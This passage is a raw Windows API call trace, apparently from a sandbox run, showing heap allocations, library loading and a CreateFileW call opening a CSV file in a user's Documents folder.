cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0172.571] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0172.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0172.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c28e8 [0172.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0172.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.572] FreeLibrary (hLibModule=0x75c90000) returned 1 [0172.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.572] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.572] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0172.572] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.575] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.578] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0172.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0172.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd8e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0172.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.579] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0172.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0xa672a8 [0172.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0172.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0172.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\mo9b rc5.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa672a8 | out: hHeap=0x8a0000) returned 1 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.581] RtlAllocateHeap 